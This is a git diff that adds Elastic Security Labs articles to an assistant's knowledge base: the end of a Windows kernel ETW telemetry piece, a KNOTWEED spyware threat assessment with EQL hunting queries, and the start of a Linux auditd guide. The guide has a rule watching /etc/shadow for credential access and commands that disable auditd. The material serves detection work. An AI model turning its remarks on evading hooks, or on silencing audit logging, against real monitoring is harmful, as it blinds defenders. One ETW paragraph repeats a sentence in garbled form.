+For example, an adversary might be able to easily avoid an in-process user-mode hook on `ntdll!NtProtectVirtualMemory`, but bypassing a kernel [PROTECTVM](https://github.com/search?type=code&q=repo:jdu2600/Windows10EtwEvents+PROTECTVM) ETW event is significantly harder. Or, at least, [it should be](https://www.elastic.co/security-labs/forget-vulnerable-drivers-admin-is-all-you-need).
+
+![Sample ETW providers and where they are logged](/assets/images/kernel-etw-best-etw/image3.png "Sample ETW providers and where they are logged")
+
+The Security Event Log is effectively just persistent storage for the events from the Microsoft-Windows-Security-Auditing ETW provider. Surprisingly, [Security Event 4688](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4688) for process creation is not a kernel event. The kernel dispatches the data to the Local Security Authority (`lsass.exe`) service, emitting an ETW event for the Event Log to consume. So, the data could be tampered with from within that server process. Contrast this with the `ProcessStart` event from the Microsoft-Windows-Kernel-Process provider, which is logged directly by the kernel and requires kernel-level privileges to interfere with.
+
+The second consideration is then the reliability of the information being logged. You might trust the event source, but what if it is just [blindly logging](https://www.elastic.co/security-labs/effective-parenting-detecting-lrpc-based-parent-pid-spoofing) [client-supplied data](https://labs.withsecure.com/publications/spoofing-call-stacks-to-confuse-edrs) that is extrinsic to the event being logged?
+
+In this article, we’ll focus on kernel ETW events. These are typically the most security-relevant because they are difficult to bypass and often pertain to privileged actions being performed on behalf of a client thread.
+
+When Microsoft introduced Kernel Patch Protection, security vendors were significantly constrained in their ability to monitor the kernel. Given the limited number of kernel extension points provided by Microsoft, they were increasingly compelled to rely on asynchronous ETW events for after-the-fact visibility of kernel actions performed on behalf of malware. 
+
+Given this dependency, the public documentation of Windows kernel telemetry sources is unfortunately somewhat sparse.
+
+![The events in Microsoft-Windows-Kernel-Audit-API-Calls are somewhat opaque](/assets/images/kernel-etw-best-etw/image11.png "The events in Microsoft-Windows-Kernel-Audit-API-Calls are somewhat opaque")
+
+## Kernel ETW Events
+
+There are currently [four types of ETW providers](https://learn.microsoft.com/en-us/windows/win32/etw/about-event-tracing#types-of-providers) that we need to consider.  
+
+Firstly, there are legacy and modern variants of “event provider”:
+
+* legacy ([mof](https://learn.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof-)-based) event providers
+* modern ([manifest](https://learn.microsoft.com/en-us/windows/win32/wes/writing-an-instrumentation-manifest)-based) event providers
+
+And then there are legacy and modern variants of “trace provider”:
+
+* legacy Windows software trace preprocessor ([WPP](https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/wpp-software-tracing)) trace providers
+* modern [TraceLogging](https://learn.microsoft.com/en-us/windows/win32/tracelogging/trace-logging-about) trace providers
+
+The “event” versus “trace” distinction is mostly semantic. Event providers are typically registered with the operating system ahead of time, and you can inspect the available telemetry metadata. These are typically used by system administrators for troubleshooting purposes and are often semi-documented. But when something goes really, _really_ wrong there are (hidden) trace providers. These are typically used only by the original software authors for advanced troubleshooting and are undocumented.
+
+In practice, each uses a slightly different format file to describe and register its events and this introduces minor differences in how the events are logged - and, more importantly, how the potential events can be enumerated.
+
+### Modern Kernel Event Providers
+
+The modern kernel ETW providers aren’t strictly documented. However, registered event details can be queried from the operating system via the [Trace Data Helper API](https://learn.microsoft.com/en-us/windows/win32/api/tdh/). Microsoft’s [PerfView](https://github.com/microsoft/perfview) tool uses these APIs to reconstruct the provider’s [registration manifest](https://github.com/microsoft/perfview/blob/319be737115e01f77c42804cd1d41755211347f3/src/TraceEvent/RegisteredTraceEventParser.cs#L88), and Pavel Yosifovich’s [EtwExplorer](https://github.com/zodiacon/EtwExplorer) then wraps these manifests in a simple GUI. You can use these [tab-separated value files](https://github.com/jdu2600/Windows10EtwEvents/tree/master/manifest) of registered manifests from successive Windows versions. A single line per event is very useful for grepping, though others have since published the [raw XML manifests](https://github.com/nasbench/EVTX-ETW-Resources/tree/main/ETWProvidersManifests).
+
+These aren’t all of the possible Windows ETW events, however. They are only the ones registered with the operating system by default. For example, the ETW events for many [server roles aren’t registered](https://github.com/nasbench/EVTX-ETW-Resources/issues/52) until that feature is enabled.
+
+### Legacy Kernel Event Providers
+
+The [legacy kernel events](https://docs.microsoft.com/en-us/windows/win32/etw/msnt-systemtrace) are documented by Microsoft. Mostly.
+
+Legacy providers also exist within the operating system as WMI [EventTrace](https://learn.microsoft.com/en-us/windows/win32/etw/eventtrace) classes. Providers are the root classes, groups are the children, and events are the grandchildren.
+
+![Enumerating MOF providers with wbemtest](/assets/images/kernel-etw-best-etw/image8.png "Enumerating MOF providers with wbemtest")
+
+To search the legacy events in the same way as modern eventTo search legacy events in the same way as modern events, these classes were parsed, and the original MOF (mostly) reconstructed. This [MOF support was added to EtwExplorer,](https://github.com/zodiacon/EtwExplorer/pull/3) and [tab-separated value summaries](https://github.com/jdu2600/Windows10EtwEvents/tree/master/mof) of the legacy events were these classes were parsed and the original MOF (mostly) reconstructed. This [MOF support was added to EtwExplorer](https://github.com/zodiacon/EtwExplorer/pull/3) and [tab-separated value summaries](https://github.com/jdu2600/Windows10EtwEvents/tree/master/mof) of the legacy events published. 
+
+![Enumerating MOF providers with ETW Explorer](/assets/images/kernel-etw-best-etw/image6.png "Enumerating MOF providers with ETW Explorer")
+
+The fully reconstructed Windows Kernel Trace MOF is [here](https://gist.github.com/jdu2600/a2b03e4e9cf19282a41ad766388c9856) (or in a tabular format [here](https://github.com/jdu2600/Windows10EtwEvents/blob/master/mof/Windows_Kernel_Trace.tsv)).
+
+Of the 340 registered legacy events, only 116 were documented. Typically, each legacy event needs to be enabled via a specific flag, but these weren’t documented either. There was a clue in the documentation for the kernel [Object Manager Trace](https://learn.microsoft.com/en-us/windows/win32/etw/obtrace) events. It mentioned `PERF_OB_HANDLE`, a constant that is not defined in the headers in the latest SDK. Luckily, [Geoff Chappell](https://geoffchappell.com/studies/windows/km/ntoskrnl/api/etw/tracesup/perfinfo_groupmask.htm) and the Windows 10 1511 WDK came to the rescue. This information was used to add support for `PERFINFO_GROUPMASK` kernel trace flags to Microsoft’s [KrabsETW](https://github.com/microsoft/krabsetw/blob/master/examples/NativeExamples/kernel_trace_002.cpp) library. It also turned out that the Object Trace documentation was wrong. That non-public constant can only be used with an undocumented API extension. Fortunately, public Microsoft projects such as `PerfView` often provide [examples of how to use undocumented APIs](https://github.com/microsoft/perfview/blob/51ec1dffe9055ab58ba1b13d1b716b36760ed895/src/TraceEvent/ETWKernelControl.cs#L464-L469).
+
+With both manifests and MOFs published on GitHub, most kernel events can now be found with [this query](https://github.com/search?type=code&q=repo:jdu2600/Windows10EtwEvents+kernel).
+
+Interestingly, Microsoft often [obfuscates](https://en.wikipedia.org/wiki/Security_through_obscurity) the names of security-relevant events, so searching for events with a generic name prefix such as `task_` yields some [interesting results](https://github.com/search?type=code&q=repo:jdu2600/Windows10EtwEvents+kernel+task_).
+
+Sometimes the keyword hints to the event’s purpose. For example, `task_014` in `Microsoft-Windows-Kernel-General` is enabled with the keyword `KERNEL_GENERAL_SECURITY_ACCESSCHECK.`
+
+And thankfully, the parameters are almost always well-named. We might guess that `task_05` in `Microsoft-Windows-Kernel-Audit-API-Calls` is related to [OpenProcess](https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess) since it logs fields named `TargetProcessId` and `DesiredAccess`.
+
+[Another useful query](https://github.com/search?type=code&q=repo:jdu2600/Windows10EtwEvents+kernel+processstartkey) is to search for events with an explicit `ProcessStartKey` field. ETW events can be [configured](https://learn.microsoft.com/en-us/windows/win32/api/evntrace/ns-evntrace-enable_trace_parameters) to include this field for the logging process, and any event that includes this information for another process is often security relevant.
+
+If you had a specific API in mind, you might query for its name or its parameters. For example, if you want Named Pipe events, you might use [this query](https://github.com/search?type=code&q=repo:jdu2600/Windows10EtwEvents+kernel+namedpipe).
+
+In this instance, though, `Microsoft-Windows-SEC` belongs to the built-in Microsoft Security drivers that Microsoft Defender for Endpoint (MDE) utilizes. This provider is only officially available to MDE, though [Sebastian Feldmann and Philipp Schmied](https://www.youtube.com/watch?v=tuoA3KGKf7o) have demonstrated how to start a session using an [AutoLogger](https://learn.microsoft.com/en-us/windows/win32/etw/configuring-and-starting-an-autologger-session) and subscribe to that session’s events. This is only currently useful for MDE users as otherwise, the driver is not configured to emit events.
+
+But what about trace providers?
+
+### Modern Kernel Trace Providers
+
+TraceLogging metadata is stored as an opaque blob within the logging binary. Thankfully this format has been reversed by [Matt Graeber](https://posts.specterops.io/data-source-analysis-and-dynamic-windows-re-using-wpp-and-tracelogging-e465f8b653f7). We can use Matt’s script to dump all TraceLogging metadata for `ntoskrnl.exe`. A sample dump of Windows 11 TraceLogging metadata is [here](https://gist.github.com/jdu2600/288475bc43ea68636c28cb25ddeb934f).
+
+Unfortunately, the metadata structure alone doesn’t retain the correlation between providers and events.  There are interesting provider names, such as `Microsoft.Windows.Kernel.Security` and `AttackSurfaceMonitor`, but it’s not yet clear from our metadata dump which events belong to these providers.
+
+### Legacy Kernel Trace Providers
+
+WPP metadata is stored within symbols files (PDBs).  Microsoft includes this information in the [public symbols for some, but not all, drivers](https://techcommunity.microsoft.com/t5/microsoft-usb-blog/how-to-include-and-view-wpp-trace-messages-in-a-driver-8217-s/ba-p/270778).  The kernel itself, however, does not produce any WPP events. Instead, the legacy Windows Kernel Trace event provider can be passed undocumented flags to enable the legacy “trace” events usually only available to Microsoft kernel developers.
+
+| Provider               | Documentation | Event Metadata               |
+|------------------------|---------------|------------------------------|
+| Modern Event Providers | None          | [Registered XML manifests](https://github.com/microsoft/perfview/blob/51ec1dffe9055ab58ba1b13d1b716b36760ed895/src/TraceEvent/RegisteredTraceEventParser.cs#L81-L529)     |
+| Legacy Event Providers | Partial       | [EventTrace WMI objects](https://learn.microsoft.com/en-us/windows/win32/etw/retrieving-event-data-using-mof)       |
+| Modern Trace Providers | None          | [Undocumented blob in binary](https://gist.github.com/mattifestation/edbac1614694886c8ef4583149f53658)  |
+| Legacy Trace Providers | None          | [Undocumented blob in Symbols](https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/trace-message-format-file) |
+
+## Next Steps
+
+We now have kernel event metadata for each of the four flavours of ETW provider, but a list of ETW events is just our starting point. Knowing the provider and event keyword may not be enough to generate the events we expect. Sometimes, an additional configuration registry key or API call is required. More often, though, we just need to understand the exact conditions under which the event is logged.
+
+Knowing exactly where and what is being logged is critical to truly understanding your telemetry and its limitations. And, thanks to decompilers becoming readily available, we have the option of some just-enough-reversing available to us. In IDA we call this “press F5”. Ghidra is the open-source alternative and it supports scripting … with Java.
+
+For kernel ETW, we are particularly interested in `EtwWrite` calls that are reachable from system calls. We want as much of the call site parameter information as possible, including any associated public symbol information. This meant that we needed to walk the call graph but also attempt to resolve the possible values for particular parameters.
+
+![alt_text](/assets/images/kernel-etw-best-etw/image4.png "image_tooltip")
+
+![EtwWrite documentation](/assets/images/kernel-etw-best-etw/image12.png "EtwWrite documentation")
+
+The necessary parameters were the `RegHandle` and the `EventDescriptor`.  The former is an opaque handle for the provider, and the latter provides event-specific information, such as the event id and its associated keywords.  An ETW keyword is an identifier used to enable a set of events. 
+
+Even better, these event descriptors were typically stored in a global constant with a public symbol.
+
+![Example ntoskrnl.exe EVENT_DESCRIPTOR in Ghidra](/assets/images/kernel-etw-best-etw/image1.png "Example ntoskrnl.exe EVENT_DESCRIPTOR in Ghidra")
+
+We had sufficient event metadata but still needed to resolve the opaque provider handle assigned at runtime back to the metadata about the provider. For this, we also needed the `EtwRegister` calls.
+
+![EtwRegister documentation](/assets/images/kernel-etw-best-etw/image9.png "EtwRegister documentation")
+
+![Example ntoskrnl.exe EtwRegister in Ghidra](/assets/images/kernel-etw-best-etw/image10.png "Example ntoskrnl.exe EtwRegister in Ghidra")
+
+The typical pattern for kernel modern event providers was to store the constant provider GUID and the runtime handle in globals with public symbols.
+
+Another pattern encountered was calls to `EtwRegister`, `EtwEwrite`, and `EtwUnregister`, all in the same function. In this case, we took advantage of the locality to find the provider GUID for the event.
+
+Modern TraceLogging providers, however, did not have associated per-provider public symbols to provide a hint of each provider’s purpose. However, Matt Graeber had [reversed the TraceLogging metadata](https://posts.specterops.io/data-source-analysis-and-dynamic-windows-re-using-wpp-and-tracelogging-e465f8b653f7) format and documented that the provider name is stored at a [fixed offset](https://gist.github.com/mattifestation/edbac1614694886c8ef4583149f53658#file-tlgmetadataparser-psm1-L461-L473) from the provider GUID. Having the exact provider name is even better than just the public symbol we recovered for modern events.
+
+![Example TraceLogging Provider blob in Ghidra](/assets/images/kernel-etw-best-etw/image7.png "Example TraceLogging Provider blob in Ghidra")
+
+This just left the legacy providers. They didn’t seem to have either public symbols or metadata blobs.  Some constants are passed to an undocumented function named `EtwTraceKernelEvent` which wraps the eventual ETW write call.
+
+![Example legacy provider EtwTraceKernelEvent call in Ghidra](/assets/images/kernel-etw-best-etw/image5.png "Example legacy provider EtwTraceKernelEvent call in Ghidra")
+
+Those constants are present in the Windows 10 1511 WDK headers (and the [System Informer](https://github.com/winsiderss/systeminformer/blob/7ad69bf13d31892a89be7230bdbd47ffde024a2b/phnt/include/ntwmi.h#L725) headers), so we could label these events with the constant names.
+
+![ntwmi.h extract](/assets/images/kernel-etw-best-etw/image2.png "ntwmi.h extract")
+
+This script has been recently updated for Ghidra 11, along with improved support for TraceLogging and Legacy events. You can now find it on GitHub here - [https://github.com/jdu2600/API-To-ETW](https://github.com/jdu2600/API-To-ETW)
+
+Sample output for the Windows 11 kernel is [here](https://github.com/jdu2600/API-To-ETW/blob/main/ntoskrnl.exe.csv).
+
+Our previously anonymous `Microsoft-Windows-Kernel-Audit-API-Calls` events are quickly unmasked by this script.
+
+| Id | EVENT_DESCRIPTOR Symbol                                   | Function                                 |
+|----|-----------------------------------------------------------|------------------------------------------|
+| 1  | KERNEL_AUDIT_API_PSSETLOADIMAGENOTIFYROUTINE              | PsSetLoadImageNotifyRoutineEx            |
+| 2  | KERNEL_AUDIT_API_TERMINATEPROCESS                         | NtTerminateProcess                       |
+| 3  | KERNEL_AUDIT_API_CREATESYMBOLICLINKOBJECT                 | ObCreateSymbolicLink                     |
+| 4  | KERNEL_AUDIT_API_SETCONTEXTTHREAD                         | NtSetContextThread                       |
+| 5  | KERNEL_AUDIT_API_OPENPROCESS                              | PsOpenProcess                            |
+| 6  | KERNEL_AUDIT_API_OPENTHREAD                               | PsOpenThread                             |
+| 7  | KERNEL_AUDIT_API_IOREGISTERLASTCHANCESHUTDOWNNOTIFICATION | IoRegisterLastChanceShutdownNotification |
+| 8  | KERNEL_AUDIT_API_IOREGISTERSHUTDOWNNOTIFICATION           | IoRegisterShutdownNotification           |
+
+Symbol and containing function for Microsoft-Windows-Kernel-Audit-API-Calls events
+
+With the call path and parameter information recovered by the script, we can also see that the `SECURITY_ACCESSCHECK` event from earlier is associated with the [SeAccessCheck](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-seaccesscheck) kernel API, but only logged within a function named `SeLogAccessFailure`. Only logging failure conditions is a very common occurrence with ETW events. For troubleshooting purposes, the original ETW use case, these are typically the most useful and the implementation in most components reflects this. Unfortunately, for security purposes, the inverse is often true. The successful operation logs are usually more useful for finding malicious activity. So, the value of some of these legacy events is often low.
+
+Modern [Secure by Design](https://www.cisa.gov/resources-tools/resources/secure-by-design) practice is to audit log both success and failure for security relevant activities and Microsoft continues to add new security-relevant ETW events that do this. For example, the preview build of Windows 11 24H2 includes some [interesting new ETW events](https://windows-internals.com/an-end-to-kaslr-bypasses/) in the `Microsoft-Windows-Threat-Intelligence` provider. Hopefully, these will be documented for security vendors ahead of its release. 
+
+Running this decompiler script across interesting Windows drivers and service DLLs is left as an exercise to the reader.
\ No newline at end of file
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/knotweed_assessment_summary.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/knotweed_assessment_summary.md
new file mode 100644
index 0000000000000..623534148492f
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/knotweed_assessment_summary.md
@@ -0,0 +1,104 @@
+---
+title: "KNOTWEED Assessment Summary"
+slug: "knotweed-assessment-summary"
+date: "2022-11-30"
+description: "KNOTWEED deploys the Subzero spyware through the use of 0-day exploits for Adobe Reader and the Windows operating system. Once initial access is gained, it uses different sections of Subzero to maintain persistence and perform actions on the host."
+author:
+  - slug: andrew-pease
+image: "blog-thumb-blind-spots.png"
+category:
+  - slug: security-research
+  - slug: vulnerability-updates
+---
+
+## Key Takeaways
+
+- KNOTWEED is an activity group sponsored by the PSOA entity DSIRF
+
+- KNOTWEED uses 0-day exploits to load custom malware and frameworks onto victim systems
+
+- Elastic Endpoint Security prevents the execution chain of the VBA from infecting the host with spyware associated with KNOTWEED
+
+## Summary
+
+On July 27, 2022, Microsoft Threat Intelligence Center (MSTIC) [disclosed](https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/) a private-sector offensive actor (PSOA) that is using 0-day exploits in targeted attacks against European and Central American victims. MSTIC and others are tracking this activity group as KNOTWEED.
+
+PSOAs sell hacking tools, malware, exploits, and services. KNOTWEED is produced by the PSOA named [DSIRF](https://web.archive.org/web/20220713203741/https:/dsirf.eu/about/). DSIRF has been linked to the sale of a malicious toolset (among others) called Subzero which has been observed being deployed through the use of 0-day exploits targeting Adobe and the Windows operating system.
+
+MSTIC has observed victims in the legal, financial, and NGO verticals in Europe and Latin America.
+
+## Assessment
+
+### Risk
+
+KNOTWEED deploys the Subzero spyware through the use of 0-day exploits for Adobe Reader and the Windows operating system. Once initial access is gained, KNOTWEED uses different sections of Subzero to maintain persistence (Jumplump) and to perform actions on the infected host (Corelump).
+
+Successful execution of the Subzero spyware allows for the clandestine collection of sensitive information such as credential pairs, system locations, internal reconnaissance, and other remote access capabilities common among spyware.
+
+### Impact
+
+PSOAs are commonly used by activity groups as a way to “leapfrog” capabilities in exploiting and attacking well-defended targets. These activity groups include national intelligence and law enforcement organizations performing sanctioned operations, as well as oppressive governments as a way to collect information on journalists, political dissidents, and activists.
+
+Successful execution of the Subzero spyware payload could put targets in danger of physical harm or persecution from non-law enforcement organizations.
+
+### Countermeasures
+
+**Elastic Protections**  
+Attempts to use a Visual Basic for Applications (VBA) script for initial execution generates a **Memory Threat Prevention Alert: Shellcode Injection** event. This would stop the execution chain from proceeding and prevent the Subzero spyware from infecting the host.
+
+![](/assets/images/knotweed-assessment-summary/1.png)
+
+![](/assets/images/knotweed-assessment-summary/2.png)
+
+As of this writing, 4 of the indicators provided by MSTIC were detected by the Elastic malware scoring model as being malicious. The 4 files are used for initial execution (the VBA), credential theft (PassLib), a modular hacking tool (Mex), and the main malware (Corelump). Indicators that were undetected were variations of the persistence loader (Jumplump).
+
+While the persistence loader is not detected as malicious, the initial execution prevention of the VBA stops the malware from getting to the persistence phase of the infection.
+
+All files have been tagged as malicious and will be reflected in the next malware model.
+
+**Elastic Detections**
+
+The following existing public Detection Rules would have identified the main persistence method used by the JumpLump malware and other post-exploitation techniques :
+
+- [Modification of WDigest Security Provider](https://github.com/elastic/detection-rules/blob/main/rules/windows/credential_access_mod_wdigest_security_provider.toml)
+- [Potential Credential Access via Windows Utilities](https://github.com/elastic/detection-rules/blob/main/rules/windows/credential_access_cmdline_dump_tool.toml)
+- [Component Object Model Hijacking](https://github.com/elastic/detection-rules/blob/main/rules/windows/persistence_suspicious_com_hijack_registry.toml)
+
+![](/assets/images/knotweed-assessment-summary/3.png)
+
+**Hunting Queries**
+
+The following EQL queries can be used to hunt for additional behaviors related to JumpLump:
+
+_Abnormally large JPEG dropped by Jumplump:_
+
+```
+file where event.action != "deletion" and
+process.executable : "?:\\Windows\\System32\\*.exe" and
+file.path : "?:\\Users\\*\\AppData\\Local\\Temp\\*.jpg" and file.name regex """[0-9]{17}\.jpg""" and file.size >= 1000000
+```
+
+![](/assets/images/knotweed-assessment-summary/4.png)
+
+_Image load or PE file creation in the print spooler color directory:_
+
+```
+any where event.category in ("file", "library") and (file.path : "?:\\Windows\\system32\\spool\\drivers\\color\\*.dll" or dll.path : "?:\\Windows\\system32\\spool\\drivers\\color\\*.dll")
+```
+
+![](/assets/images/knotweed-assessment-summary/5.png)
+
+**Observations**
+
+While there have been no customer observations in Elastic telemetry, this is not unexpected as this activity group has been observed targeting particular victims and the attack pattern or intrusion set appears to be very niche and not widespread. Elastic Security will continue to observe the threat actor and update our readers accordingly.
+
+## Terminology
+
+- **0-day exploit** - vulnerability previously unknown to defenders and does not have a public patch
+- **Activity Group** - individuals, groups, or organizations believed to be operating with malicious intent
+- **Attack Pattern** - describe ways that adversaries attempt to compromise targets
+- **Intrusion Set** - adversarial behaviors and resources with common properties that are believed to be orchestrated by a single organization
+
+## References
+
+- https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/linux_detection_engineering_with_auditd.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/linux_detection_engineering_with_auditd.md
new file mode 100644
index 0000000000000..dadc345ef162a
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/linux_detection_engineering_with_auditd.md
@@ -0,0 +1,477 @@
+---
+title: "Linux detection engineering with Auditd"
+slug: "linux-detection-engineering-with-auditd"
+date: "2024-04-09"
+description: "In this article, learn more about using Auditd and Auditd Manager for detection engineering."
+author:
+  - slug: ruben-groenewoud
+image: "Security Labs Images 30.jpg"
+category:
+  - slug: detection-science
+tags:
+  - slug: linux
+  - slug: auditd
+---
+
+## Introduction
+
+Unix and Linux systems operate behind the scenes, quietly underpinning a significant portion of our technological infrastructure. With the increasing complexity of threats targeting these systems, ensuring their security has become more important than ever.
+
+One of the foundational tools in the arsenal of security detection engineers working within Unix and Linux systems is [Auditd](https://linux.die.net/man/8/auditd). This powerful utility is designed for monitoring and recording system events, providing a detailed audit trail of who did what and when. It acts as a watchdog, patrolling and recording detailed information about system calls, file accesses, and system changes, which are crucial for forensic analysis and real-time monitoring.
+
+The objective of this article is multifaceted:
+
+ 1. We aim to provide additional information regarding Auditd, showcasing its capabilities and the immense power it holds in security detection engineering.
+ 2. We will guide you through setting up Auditd on your own systems, tailoring it to meet your specific monitoring needs. By understanding how to create and modify Auditd rules, you will learn how to capture the exact behavior you're interested in monitoring and interpret the resulting logs to create your own detection rules.
+ 3. We'll introduce Auditd Manager, an integration tool that enhances Auditd’s utility by simplifying the management of Auditd across systems.
+
+By the end of this post, you'll not only learn how to employ Auditd Manager to incorporate some of our [pre-built detection rules](https://github.com/elastic/detection-rules/tree/main/rules) into your security strategy, but also gain a comprehensive understanding of Auditd and how to leverage it to build your own detection rules as well.
+
+## Introduction to Auditd
+
+Auditd is a Linux tool designed for monitoring and recording system events to provide a comprehensive audit trail of user activities, system changes, and security access. Auditd operates by hooking into the Linux kernel, capturing detailed information about system calls and other system events as they happen. These events are then logged to a file, providing a timestamped record. Administrators can define rules that specify which events to log, offering the flexibility to focus on specific areas of interest or concern. The logged data can be used for a variety of purposes, from compliance auditing to detailed forensic analysis.
+
+## Auditd setup
+
+To get started with Auditd, Elastic provides several options:
+
+ - [Auditbeat’s Auditd module](https://www.elastic.co/guide/en/beats/auditbeat/current/auditbeat-module-auditd.html)
+ - [Filebeat’s Auditd module](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-auditd.html)
+ - [Elastic Agent’s Auditd Logs integration](https://docs.elastic.co/en/integrations/auditd)
+ - [Elastic Agent’s Auditd Manager integration](https://docs.elastic.co/integrations/auditd_manager)
+
+In this article, we will focus on the latter two, leveraging the [Elastic Agent](https://www.elastic.co/elastic-agent) to easily ingest logs into Elasticsearch. If you are new to Elasticsearch you can easily create an [Elastic Cloud Account](https://www.elastic.co/cloud) with a 30-day trial license, or for local testing, you can download The [Elastic Container Project](https://github.com/peasead/elastic-container) and set the license value to trial in the .env file.
+
+Feel free to follow along using Auditbeat or Filebeat - for setup instructions, consult the documentation linked above. As the Auditd Logs integration works by parsing the audit.log file, you are required to install Auditd on the Linux host from which you wish to gather the logs. Depending on the Linux distribution and the package manager of choice, the Auditd package should be installed, and the Auditd service should be started and enabled. For Debian-based distributions:
+
+```
+sudo apt update
+sudo apt install auditd
+sudo systemctl start auditd
+sudo systemctl enable auditd
+```
+
+The ```/var/log/audit/audit.log``` file should now be populated with Auditd logs. Next, you need to install the Auditd Logs integration, create an agent policy in Fleet with the newly installed integration, and apply the integration to a compatible Elastic Agent with Auditd installed. 
+
+![Auditd Logs integration page in Elastic](/assets/images/linux-detection-engineering-with-auditd/image24.png)
+
+
+The default settings should suffice for most scenarios. Next, you need to add the integration to an agent policy, and add the agent policy to the Elastic Agents from which you want to harvest data. The Elastic Agent ships the logs to the logs-auditd.log-[namespace] datastream. You can now [create a new data view](https://www.elastic.co/guide/en/kibana/current/data-views.html) to only match our incoming Auditd logs.
+ 
+![New data view](/assets/images/linux-detection-engineering-with-auditd/image33.png)
+
+
+You can now explore the ingested Auditd logs. But as you will quickly notice, Auditd does not log much by default – you must leverage Auditd rules to unlock its full potential.
+
+## Auditd rules
+
+Auditd rules are directives used to specify which system activities to monitor and log, allowing for granular control over the security auditing process. These rules are typically configured in the ```/etc/audit/audit.rules``` file. Auditd rules come in 3 varieties: ```control```, ```file```, and ```syscall```. More information can be found [here](https://linux.die.net/man/7/audit.rules). 
+
+### Control type rules
+
+The control type is, in most cases, used to configure Auditd rather than specifying the events to monitor. By default, the audit rules file contains the following control type settings:
+
+```
+-D
+-b 8192
+-f 1
+--backlog_wait_time 60000
+```
+
+ - ```-D```: delete all rules on launch (Auditd parses the rules in the file from top to bottom. Removing all rules on launch ensures a clean configuration).
+ - ```-b 8192```: set the maximum amount of existing Audit buffers in the kernel.
+ - ```-f 1```: set the failure mode of Auditd to log.
+ - ```--backlog_wait_time 60000```: specify the amount of time (in ms) that the audit system will wait if the audit backlog limit is reached before dropping audit records.
+
+### File System Rules
+
+Building upon these default control type settings, you can create file system rules, sometimes referred to as watches. These rules allow us to monitor files of interest for read, write, change and execute actions. A typical file system rule would look as follow:
+
+```
+-w [path-to-file] -p [permissions] -k [keyname]
+```
+
+ - ```-w```: the path to the file or directory to monitor.
+ - ```-p```: any of the read (r), write (w), execute (e) or change (a) permissions.
+ - ```-k```: the name of a key identifier that may be used to more easily search through the auditd logs.
+
+In case you want to monitor the ```/etc/shadow``` file for file reads, writes, and changes, and save any such events with a key named shadow_access, you could setup the following rule:
+
+```
+-w /etc/shadow -p rwa -k shadow_access
+```
+
+### System call rules
+
+Auditd’s true power is revealed when working with its system call rules. Auditd system call rules are configurations that specify which system calls (syscalls) to monitor and log, allowing for detailed tracking of system activity and interactions with the operating system kernel. As each syscall is intercepted and matched to the rule, it is important to leverage this functionality with care by only capturing the syscalls of interest and, when possible, capturing multiple of these syscalls in one rule. A typical syscall rule would look like this:
+
+```
+-a [action],[filter] -S [syscall] -F [field=value] -k [keyname]
+```
+
+You may leverage the ```-a``` flag followed by ```action,filter``` to choose when an event is logged, where ```action``` can be ```always``` (always create an event) or ```never``` (never create an event).
+
+filter can be any of:
+
+ - ```task```:  logs task creation events.
+ - ```entry```:  logs syscall entry points.
+ - ```exit```:  logs syscall exits/results.
+ - ```user```:  logs user-space events.
+ - ```exclude```:  excludes events from logging.
+
+Next, you have:
+
+ - ```-S```: the syscall that you are interested in (name or syscall number).
+ - ```-F```: one or more filters to choose what to match against.
+ - ```-k```: the key identifier.
+
+With the information provided above, you should be able to understand the basics of most Auditd rules. For more information and examples of what values can be added to these rules, feel free to read more [here](https://linux.die.net/man/7/audit.rules).
+
+Getting started building and testing a comprehensive and dedicated Auditd rule file for your organization might seem daunting. Luckily, there are some good public rule file examples available on GitHub. A personal favorite template to build upon is [Neo23x0’s](https://github.com/Neo23x0/auditd/blob/master/audit.rules), which is a good balance between visibility and performance. 
+
+One downside of using the Auditd Logs integration is that you manually need to install Auditd on each host that you want to monitor, and apply the rules file manually to each running Auditd instance. This means that every time you want to update the rules file, you will have to update it on all of the hosts. Nowadays, many organizations leverage management tools that can make this process less time consuming. However, Elastic also provides another way of ingesting Auditd logs through the Auditd Manager integration which alleviates the management burden. 
+
+## Introduction to Auditd Manager and setup
+
+The Auditd Manager integration receives audit events from the [Linux Audit Framework](https://github.com/torvalds/linux/blob/master/kernel/audit.c) that is a part of the Linux kernel. This integration establishes a subscription to the kernel to receive the events as they occur. The Linux audit framework can send multiple messages for a single auditable event. For example, a ```rename()``` syscall causes the kernel to send eight separate messages. Each message describes a different aspect of the activity that is occurring (the syscall itself, file paths, current working directory, process title). This integration will combine all of the data from each of the messages into a single event. More information regarding Auditd Manager can be found [here](https://docs.elastic.co/integrations/auditd_manager).
+
+Additionally, Auditd Manager solves the management burden as it allows centralized management through [Fleet](https://www.elastic.co/guide/en/fleet/current/fleet-overview.html). An update to the integration will automatically be applied to all Elastic agents that are part of the changed agent policy. 
+
+Setting up the Auditd Manager integration is simple. You need to make sure that Auditd is no longer running on our hosts, by stopping and disabling the service.
+
+```
+sudo systemctl stop auditd
+sudo systemctl disable auditd
+```
+
+You can now remove the Auditd Logs integration from our agent policy, and instead install/add the Auditd Manager integration.
+
+![Auditd Manager integration in Elastic](/assets/images/linux-detection-engineering-with-auditd/image30.png)
+
+
+There are several options available for configuring the integration. Auditd Manager provides us with the option to set the audit config as immutable (similar to setting the ```-e 2``` control-type rule in the Auditd configuration), providing additional security in which unauthorized users cannot change the audit system, making it more difficult to hide malicious activity. 
+
+You can leverage the Resolve IDs functionality to enable the resolution of UIDs and GIDs to their associated names.
+
+![Resolve IDs toggle](/assets/images/linux-detection-engineering-with-auditd/image25.png)
+
+
